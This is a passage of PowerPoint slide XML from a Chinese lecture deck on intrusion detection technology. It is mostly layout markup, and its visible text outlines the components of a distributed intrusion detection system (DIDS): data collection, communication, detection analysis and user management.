                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF4BA50-6F79-4FE0-BB85-8085EE0839A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="4320000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0402F17D-9F88-4B2E-A2AA-6923F05BD2EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="矩形: 圆角 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650FD5F4-700F-4B0F-A2B8-16032AC000BF}"/>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8F3D8D06-0624-458B-A28D-DE6AA2A8DE2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04</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0A859A2D-CD96-4333-A77B-BDB862C2EA42}"/>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设计和部署</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ECB501-4561-4A8B-88BE-E5161D7F9B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="5220000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="组合 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242A2424-D0A6-4827-88BE-67EAB3DBF146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="矩形: 圆角 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECDEF9F-D729-4403-B8DA-D4E751BBA199}"/>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8214CB29-1AB2-4F17-9C41-BEA3D489A22A}"/>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05</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257C772-5D23-4601-A412-371CC7099EA0}"/>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发展趋势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="标题 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB32422-F32E-444F-8DBA-2CC4A9ADFB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>讲 入侵检测技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="625567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p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3390900" y="2461628"/>
            <a:ext cx="5410200" cy="3438525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D9262CB-5E8B-4278-8425-4DA172B99D75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.3 DIDS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BBB0F12-97B6-47BF-9362-46E60CD7A3D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="720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effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>分布式入侵检测系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="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190625" y="2291626"/>
            <a:ext cx="9655810" cy="564515"/>
            <a:chOff x="563" y="3565"/>
            <a:chExt cx="15206" cy="889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="AutoShape 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2468" y="3565"/>
              <a:ext cx="13301" cy="889"/>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42" name="AutoShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2650" y="3807"/>
              <a:ext cx="1000" cy="430"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 100000"/>
                <a:gd name="adj2" fmla="val 57633"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FEFEFE"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="142343" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3499" y="3658"/>
              <a:ext cx="12122" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buBlip>
                  <a:blip r:embed="rId3"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>传递加工、处理原始数据。需和其他构件协作完成通信功能。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="AutoShape 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="680" y="3565"/>
              <a:ext cx="2293" cy="888"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="865" y="3658"/>
              <a:ext cx="1313" cy="46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46" name="Text Box 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="563" y="3695"/>
              <a:ext cx="2472" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>通信传输</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1254125" y="1440000"/>
            <a:ext cx="9726930" cy="696595"/>
            <a:chOff x="625" y="1830"/>
            <a:chExt cx="15318" cy="1097"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12599" y="2301"/>
              <a:ext cx="725"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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>二</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2598" y="1853"/>
              <a:ext cx="13171" cy="90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39" name="AutoShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2650" y="2067"/>
              <a:ext cx="1000" cy="488"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 100000"/>
                <a:gd name="adj2" fmla="val 57559"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FEFEFE"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="142340" name="TextBox 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3513" y="1925"/>
              <a:ext cx="12431" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buBlip>
                  <a:blip r:embed="rId3"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>收集检测使用的数据。可驻留在主机上，或者安装在网络检测点上。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="AutoShape 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="638" y="1830"/>
              <a:ext cx="2293" cy="92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sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="768" y="1935"/>
              <a:ext cx="1335" cy="52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52" name="Text Box 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="625" y="1938"/>
              <a:ext cx="2363" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>数据采集</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1223010" y="3121614"/>
            <a:ext cx="9656127" cy="960437"/>
            <a:chOff x="563" y="5268"/>
            <a:chExt cx="15206" cy="1512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2608" y="5270"/>
              <a:ext cx="13161" cy="1510"/>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48" name="AutoShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2653" y="5840"/>
              <a:ext cx="1000" cy="483"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 100000"/>
                <a:gd name="adj2" fmla="val 57340"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FEFEFE"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="142349" name="TextBox 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3475" y="5711"/>
              <a:ext cx="12146" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buBlip>
                  <a:blip r:embed="rId3"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>采用检测算法对数据进行分析，产生检测结果、报警和应急信号。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="AutoShape 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="645" y="5268"/>
              <a:ext cx="2293" cy="1508"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="833" y="5350"/>
              <a:ext cx="1215" cy="53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55" name="Text Box 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="563" y="5443"/>
              <a:ext cx="2415" cy="1113"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>入侵检测</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1275082" y="5226816"/>
            <a:ext cx="9655810" cy="619125"/>
            <a:chOff x="563" y="8763"/>
            <a:chExt cx="15206" cy="975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="AutoShape 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2468" y="8763"/>
              <a:ext cx="13301" cy="974"/>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60" name="AutoShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2650" y="9049"/>
              <a:ext cx="1000" cy="510"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 100000"/>
                <a:gd name="adj2" fmla="val 57416"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FEFEFE"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="142361" name="TextBox 34"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3535" y="8783"/>
              <a:ext cx="12086" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buBlip>
                  <a:blip r:embed="rId3"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>管理构件配置，产生总体报告，提供管理接口等。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="AutoShape 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="612" y="8763"/>
              <a:ext cx="2361" cy="975"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="865" y="8863"/>
              <a:ext cx="1313" cy="6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64" name="Text Box 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="563" y="8950"/>
              <a:ext cx="2434" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>用户管理</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1284287" y="4354328"/>
            <a:ext cx="9623425" cy="573405"/>
            <a:chOff x="613" y="7030"/>
            <a:chExt cx="15155" cy="903"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2598" y="7033"/>
              <a:ext cx="13170" cy="901"/>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57" name="AutoShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2650" y="7265"/>
              <a:ext cx="1000" cy="488"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 100000"/>
                <a:gd name="adj2" fmla="val 57559"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FEFEFE"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
